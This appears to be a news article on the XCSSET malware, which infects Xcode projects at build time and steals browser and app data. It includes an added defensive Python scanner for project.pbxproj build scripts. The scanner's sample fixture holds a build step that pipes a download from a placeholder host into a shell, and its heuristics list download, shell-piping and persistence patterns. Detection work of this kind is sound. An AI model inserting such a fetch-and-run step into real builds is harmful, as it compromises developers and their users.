XCSSET is a new malware that spreads through Xcode projects and exploits two zero-day vulnerabilities to steal sensitive information from target systems.
The first zero-day issue is used to steal cookies via a flaw in the behaviour of Data Vaults, while the second is used to abuse the development version of Safari.
The malicious code is injected into local Xcode projects so that the malware is executed whenever the project is built. This creates a risk for Xcode developers. How the threat initially enters Xcode projects is still not clear.
Trend Micro has identified that the threat escalates when affected developers share their projects on GitHub, potentially resulting in a supply-chain-like attack on users who rely on these repositories as dependencies in their own projects.
Xcode is an integrated development environment (IDE) used on macOS for developing Apple-related software and apps. It is available for free from the Mac App Store. An app built from an infected project automatically includes the malicious code.
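Because the article says the malware runs whenever an infected project is built, a useful defensive check for a developer or a CI pipeline is to enumerate every shell build phase in a project's project.pbxproj and flag scripts that download or pipe content into a shell at build time. The script below is an added example written for this page, not code from the article or from Trend Micro; it assumes, which the page does not state, that injected code would surface as a PBXShellScriptBuildPhase (the regexes rely on Xcode's own tab-indented formatting of that file), and the SAMPLE_PBXPROJ fragment, its object ids and the example.invalid URL are constructed for illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample project.pbxproj fragment: one ordinary Sources phase,
# one Run Script phase that fetches and executes remote content, and one
# harmless lint phase. Ids and URL are placeholders, not real indicators.
SAMPLE_PBXPROJ = (
    "// !$*UTF8*$!\n"
    "{\n"
    "\tobjects = {\n"
    "\t\tAA01 /* Sources */ = {\n"
    "\t\t\tisa = PBXSourcesBuildPhase;\n"
    "\t\t\tfiles = (\n\t\t\t);\n"
    "\t\t};\n"
    "\t\tAA02 /* Run Script */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    "\t\t\tname = \"Run Script\";\n"
    "\t\t\tshellPath = /bin/sh;\n"
    "\t\t\tshellScript = \"curl -fsSL https://example.invalid/setup.sh | sh\\n\";\n"
    "\t\t};\n"
    "\t\tAA03 /* Lint */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    "\t\t\tname = \"Lint\";\n"
    "\t\t\tshellPath = /bin/sh;\n"
    "\t\t\tshellScript = \"swiftlint lint --strict\\n\";\n"
    "\t\t};\n"
    "\t};\n"
    "}\n"
)


@dataclass
class ScriptPhase:
    object_id: str
    name: str
    script: str
    reasons: list = field(default_factory=list)


# Each entry of the `objects` dictionary has the shape  ID /* comment */ = { ... };
# and Xcode closes it with exactly two tabs and "};", which lets us skip nested dicts.
OBJECT_RE = re.compile(
    r"(?P<id>[0-9A-F]{4,})\s*(?:/\*.*?\*/)?\s*=\s*\{(?P<body>.*?)\n\t\t\};", re.S
)
ISA_RE = re.compile(r"isa\s*=\s*(\w+)\s*;")
NAME_RE = re.compile(r'\bname\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;]+))\s*;')
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')

# Heuristics for build-time behaviour that deserves a human look. Constructed
# for this example; tune them to the project's legitimate tooling.
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "downloads content at build time"),
    (r"\|\s*(sh|bash|zsh)\b", "pipes data into a shell"),
    (r"base64\s+(-d|-D|--decode)", "decodes base64 (possible obfuscation)"),
    (r"\beval\b", "evaluates dynamically built commands"),
    (r"\bosascript\b", "runs AppleScript from the build"),
    (r"\bnohup\b|\blaunchctl\b", "backgrounds or registers a persistent process"),
]

_ESCAPES = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}


def _unescape(value: str) -> str:
    """Undo the backslash escapes Xcode writes inside quoted pbxproj strings."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(0)), value)


def find_script_phases(pbxproj_text: str) -> list[ScriptPhase]:
    """Return every PBXShellScriptBuildPhase with its decoded shell script."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj_text):
        body = m.group("body")
        isa = ISA_RE.search(body)
        if not isa or isa.group(1) != "PBXShellScriptBuildPhase":
            continue
        name_m = NAME_RE.search(body)
        if name_m is None:
            name = "(unnamed)"
        else:
            name = name_m.group(1) if name_m.group(1) is not None else name_m.group(2)
        script_m = SCRIPT_RE.search(body)
        script = _unescape(script_m.group(1)) if script_m else ""
        phases.append(ScriptPhase(m.group("id"), name.strip(), script))
    return phases


def flag_suspicious(phases: list[ScriptPhase]) -> list[ScriptPhase]:
    """Keep only phases whose script matches a heuristic, recording why."""
    flagged = []
    for p in phases:
        p.reasons = [why for pat, why in SUSPICIOUS if re.search(pat, p.script)]
        if p.reasons:
            flagged.append(p)
    return flagged


if __name__ == "__main__":
    import sys

    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for p in flag_suspicious(find_script_phases(text)):
        print(f'{p.object_id} "{p.name}": {"; ".join(p.reasons)}')
        print("    " + p.script.strip().replace("\n", "\n    "))
```

Run it with a path to a project.pbxproj to review a real project, or with no argument to see the constructed sample flagged; a clean result does not prove a project is safe (the page notes hash checks do not help either), it only surfaces build-time scripts for review.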
According to Trend Micro, the threat can steal a variety of user data associated with popular applications, including Evernote content and data from Skype, Notes, QQ, WeChat, and Telegram. The malware also permits attackers to capture screenshots and exfiltrate stolen documents to the command-and-control server. It also includes a ransomware module that encrypts files and displays ransom demand messages.
Trend Micro believes the UXSS element could also manipulate browser sessions to display malicious websites, change cryptocurrency wallet addresses, harvest Apple Store credit card information, and steal credentials from sources including Google, Yandex, Amocrm, Apple ID, and PayPal. It also prevents the user from changing passwords and records new passwords.
"Affected developers will unwittingly distribute the malicious Trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files," said Trend Micro.